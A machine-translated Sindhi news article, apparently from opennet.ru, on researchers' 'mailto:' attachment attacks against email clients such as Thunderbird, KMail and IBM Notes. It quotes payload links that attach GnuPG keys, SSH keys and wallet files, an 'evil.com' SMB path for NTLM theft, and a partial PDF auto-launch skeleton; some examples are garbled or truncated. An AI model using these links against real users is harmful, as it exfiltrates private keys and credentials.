"mailto:" لنڪس استعمال ڪندي اي ميل ڪلائنٽ استعمال ڪندڙن تي حملو ڪرڻ

روهر يونيورسٽي بوچم (جرمني) جا محقق تجزيو ڪيو (ڪر PDF) ميل ڪلائنٽ جو رويو جڏهن پروسيس ڪري رهيو آهي “mailto:” ڳنڍڻن کي ترقي يافته پيٽرولن سان. ويهن مان پنج اي ميل ڪلائنٽ جي جانچ ڪئي وئي هڪ حملي لاءِ خطرناڪ هئي جيڪا "منسلڪ" پيراميٽر استعمال ڪندي وسيلن جي متبادل کي استعمال ڪندي. هڪ اضافي ڇهه اي ميل ڪلائنٽ هڪ PGP ۽ S/MIME ڪيئي متبادل حملي لاءِ خطرناڪ هئا، ۽ ٽي ڪلائنٽ انڪرپٽ ٿيل پيغامن جي مواد کي ڪڍڻ لاءِ حملي لاءِ خطرناڪ هئا.

لنڪس "ٽپال"هڪ اي ميل ڪلائنٽ جي کولڻ کي خودڪار ڪرڻ لاءِ استعمال ڪيو ويندو آهي ته جيئن لنڪ ۾ بيان ڪيل ايڊريس ڏانهن خط لکڻ لاءِ. ايڊريس جي اضافي ۾، توهان لنڪ جي حصي طور اضافي پيٽرولر بيان ڪري سگهو ٿا، جهڙوڪ خط جو موضوع ۽ عام مواد لاءِ ٽيمپليٽ. تجويز ڪيل حملو "منسلڪ" پيٽرولر کي ترتيب ڏئي ٿو، جيڪو توهان کي ٺاهيل پيغام سان منسلڪ ڪرڻ جي اجازت ڏئي ٿو.

ميل ڪلائنٽ Thunderbird، GNOME Evolution (CVE-2020-11879)، KDE KMail (CVE-2020-11880)، IBM/HCL نوٽس (CVE-2020-4089) ۽ Pegasus Mail هڪ ننڍڙي حملي لاءِ خطرناڪ هئا جيڪي توهان کي خودڪار طريقي سان ڳنڍڻ جي اجازت ڏين ٿا. ڪنهن به مقامي فائل، هڪ لنڪ ذريعي بيان ڪيو ويو آهي جهڙوڪ "mailto:?attach=path_to_file". فائل انتباہ ڏيکاري بغير ڳنڍيل آهي، تنهنڪري خاص ڌيان ڏيڻ کان سواء، صارف شايد نوٽيس نه ڪري سگھي ٿو ته خط هڪ منسلڪ سان موڪليو ويندو.

مثال طور، هڪ لنڪ استعمال ڪندي جهڙوڪ "mailto:[ايميل محفوظ ٿيل]&subject=Title&body=Text&attach=~/.gnupg/secring.gpg" توهان GnuPG مان خانگي ڪيز داخل ڪري سگھو ٿا خط ۾. توهان پڻ موڪلي سگهو ٿا مواد crypto wallets (~/.bitcoin/wallet.dat)، SSH ڪيز (~/.ssh/id_rsa) ۽ ڪنهن به فائلن تائين رسائي لائق استعمال ڪندڙ. ان کان علاوه، Thunderbird توهان کي "attach=/tmp/*.txt" وانگر تعميرات استعمال ڪندي ماسڪ ذريعي فائلن جا گروپ ڳنڍڻ جي اجازت ڏئي ٿو.

مقامي فائلن کان علاوه، ڪجهه اي ميل ڪلائنٽ IMAP سرور ۾ نيٽ ورڪ اسٽوريج ۽ رستن جي لنڪ تي عمل ڪندا آهن. خاص طور تي، IBM نوٽس توهان کي نيٽ ورڪ ڊاريڪٽري مان فائل منتقل ڪرڻ جي اجازت ڏئي ٿو جڏهن لنڪس پروسيس ڪري رهيا آهن جهڙوڪ "attach=\\evil.com\dummyfile"، انهي سان گڏ حملي ڪندڙ طرفان ڪنٽرول ٿيل SMB سرور ڏانهن لنڪ موڪلڻ سان NTLM جي تصديق جي پيٽرولن کي روڪيو. (درخواست موڪلي ويندي موجوده تصديق جي پيٽرولن سان صارف).

Thunderbird ڪاميابيءَ سان درخواستن تي عمل ڪري ٿو جهڙوڪ "attach=imap:///fetch>UID>/INBOX>1/"، جيڪي توهان کي IMAP سرور تي فولڊرن مان مواد ڳنڍڻ جي اجازت ڏين ٿا. ساڳئي وقت، IMAP مان حاصل ڪيل نياپا، OpenPGP ۽ S/MIME ذريعي انڪريپ ٿيل آهن، موڪلڻ کان اڳ ميل ڪلائنٽ پاران خودڪار طريقي سان ڊيڪرپٽ ٿي ويندا آهن. Thunderbird جا ڊولپر هئا اطلاع ڏنو فيبروري ۾ ۽ مسئلي جي باري ۾ تھنڊر بيڊ 78 مسئلو اڳ ۾ ئي طئي ڪيو ويو آهي (ٿنڊربرڊ شاخون 52، 60 ۽ 68 محفوظ آهن).

Thunderbird جا پراڻا نسخا تحقيق ڪندڙن پاران تجويز ڪيل PGP ۽ S/MIME تي ٻن ٻين حملي وارين قسمن لاءِ پڻ خطرناڪ هئا. خاص طور تي، Thunderbird، انهي سان گڏ OutLook، PostBox، eM ڪلائنٽ، MailMate ۽ R2Mail2، هڪ اهم متبادل حملي جي تابع هو، انهي حقيقت جي ڪري ته ميل ڪلائنٽ خودڪار طريقي سان درآمد ڪري ٿو ۽ انسٽال ڪري ٿو نوان سرٽيفڪيٽ جيڪي S/MIME پيغامن ۾ منتقل ڪيا ويا آهن، جيڪي اجازت ڏين ٿا. حملي ڪندڙ کي منظم ڪرڻ لاءِ عوامي چابين جي متبادل کي منظم ڪرڻ لاءِ جيڪو اڳ ۾ ئي صارف طرفان ذخيرو ٿيل آهي.

ٻيو حملو، جنهن لاءِ Thunderbird، PostBox ۽ MailMate حساس آهن، ڊرافٽ پيغامن کي خود محفوظ ڪرڻ لاءِ ميکانيزم جي خاصيتن کي هٿي ڏئي ٿو ۽ اجازت ڏئي ٿو، ميلٽو پيرا ميٽرز استعمال ڪندي، انڪريپٽ ٿيل پيغامن جي ڊيڪرپشن کي شروع ڪرڻ لاءِ يا پاڻمرادو پيغامن لاءِ ڊجيٽل دستخط شامل ڪرڻ سان. حملي آور جي IMAP سرور ڏانهن نتيجن جي بعد ۾ ٽرانسميشن. هن حملي ۾، ciphertext "جسم" پيٽرولر ذريعي منتقل ڪيو ويو آهي، ۽ "ميٽا ريفريش" ٽيگ استعمال ڪيو ويندو آهي ڪال شروع ڪرڻ لاء حملي ڪندڙ جي IMAP سرور ڏانهن. مثال طور: ' '

خودڪار طريقي سان پروسيس ڪرڻ لاءِ “mailto:” لنڪس بغير صارف جي رابطي جي، خاص طور تي ٺاهيل PDF دستاويز استعمال ڪري سگھجن ٿا - PDF ۾ OpenAction ايڪشن توهان کي اجازت ڏئي ٿو ته خودڪار طريقي سان ميلٽو هينڊلر لانچ ڪرڻ وقت جڏهن ڪو دستاويز کوليو وڃي:

%PDF-1.5
1 اعتراض
<< /Type /Catalog /OpenAction [2 0 R] >>
endobj

2 اعتراض
>
endobj

"mailto:" لنڪس استعمال ڪندي اي ميل ڪلائنٽ استعمال ڪندڙن تي حملو ڪرڻ

جو ذريعو: opennet.ru

تبصرو شامل ڪريو